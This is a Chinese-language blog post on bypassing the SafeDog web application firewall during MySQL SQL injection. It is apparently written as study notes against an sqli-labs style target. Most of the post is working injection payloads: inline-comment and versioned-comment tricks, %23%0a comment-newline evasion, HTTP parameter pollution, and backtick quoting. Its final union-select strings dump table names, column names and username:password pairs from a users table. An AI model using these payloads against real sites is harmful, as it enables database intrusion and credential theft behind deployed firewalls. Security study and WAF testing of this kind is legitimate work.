码迷,mamicode.com
首页 > 数据库 > 详细

SQL注入bypass学习

时间:2020-05-07 00:34:02      阅读:102      评论:0      收藏:0      [点我收藏+]

标签:mysq   sharp   操作   mda   ||   编码   ``   逻辑操作   pac   

0x00 前言

练习sql注入过程中经常会遇到一些WAF的拦截,在网上找相关文章进行学习,并通过利用安全狗来练习Mysql环境下的bypass。

0x01 一些特殊字符

1.注释符号

/*!*/:内联注释,/*!12345union*/select等效union select

/**/:注释符号,/*/**/等效于/**/

-- +:--空格加任意字符

;%00

2.其他符号

%23%0a:注释换行符
&、&&、|、||:逻辑操作符
``:反引号

 

0x02 安全狗版本

版本:网站安全狗(Apache版) 4.0.26550

技术图片

 

0x03 and绕过

首先测试语句and 1=1拦截情况

and        //不拦截
and 1=1    //拦截
and 1      //拦截
and a      //不拦截
and ‘a’    //拦截

技术图片

经测试发现and后面跟数字型或字符型时会被拦截

绕过方法有两种

1.使用其他字符替换and

使用&的url编码%26替换and进行绕过

技术图片

2.使用-1=-1和-1=-2替换绕过

可能对负数没做限制,也可能是 – 绕过了正则匹配

and -1=-1-- +
and -1=-2-- +

技术图片

 

 技术图片

0x04 绕过order by拦截

order       //不拦截
by          //不拦截
order by    //拦截

技术图片

经过测试,此处有三种方法可以绕过:

1.注释换行绕过

order--%0aby	//拦截——了解到这是最初的姿势,不过现已经失效
order%23%0aby	//不拦截——%23:注释符,%0a换行符

技术图片

2.内联注释加参数污染绕过

order /*!by*/               拦截
order/*!/*55555*/by*/       拦截
order/*!/*!50553*/by*/      拦截
order/*!/*!50553test*/by*/  不拦截但报错
order/*!/*!50554test*/by*/  不拦截

数字加字母组合可绕过,经fuzz测试,当数字大于50553时不报错

技术图片

3.hpp参数污染绕过

在跟服务器交互的过程中,http允许 get 或者post多次传同一参数值,造成覆盖达到一些绕过waf的效果。在php/apache 中,它总解析最后一个id

?id=1‘ /*&id=1‘order by 3-- +*/

技术图片

0x05 绕过union select拦截

1.注释换行加参数污染绕过

单纯使用注释换行符被拦截,经测试在注释符和换行符间加任意数字字母字符绕过

union%23a%0aselect 1,2,3-- +

技术图片

 

2.内联注释加参数绕过

同order by 绕过

技术图片

3.hpp参数污染绕过

同order by 绕过

?id=1‘ /*&id=‘union select 1,database(),3-- +*/

技术图片

 

0x06 database()拦截绕过

直接联合查询database()会被拦截

1.联合查询绕过

/*!database()*/    拦截
database/*!()*/    不拦截
database/*!(*/)    不拦截

2.hpp参数污染的语句中直接查询

后续查询均可使用此方法绕过

技术图片

 

0x07 查表名、列名、字段拦截绕过

经过测试,可以使用两种方法绕过

1.内联注释

对table_name、column_name和字段名使用内联注释绕过限制

union%23a%0aselect 1,group_concat(/*!table_name*/),3 from information_schema.tables where table_schema="security"-- +
union%23a%0aselect 1,group_concat(/*!column_name*/),3 from information_schema.columns where table_name="users"-- +
union%23a%0aselect 1,2,group_concat(/*!username*/,":",password) from users-- +
union%23a%0aselect 1,2,group_concat(username,":",/*!password*/) from users-- +

技术图片

2.反引号

对information_schema使用反引号绕过

union%23a%0aselect 1,group_concat(table_name),3 from `information_schema`.tables where table_schema="security"--+

技术图片

SQL注入bypass学习

标签:mysq   sharp   操作   mda   ||   编码   ``   逻辑操作   pac   

原文地址:https://www.cnblogs.com/Cl0wn/p/12840079.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!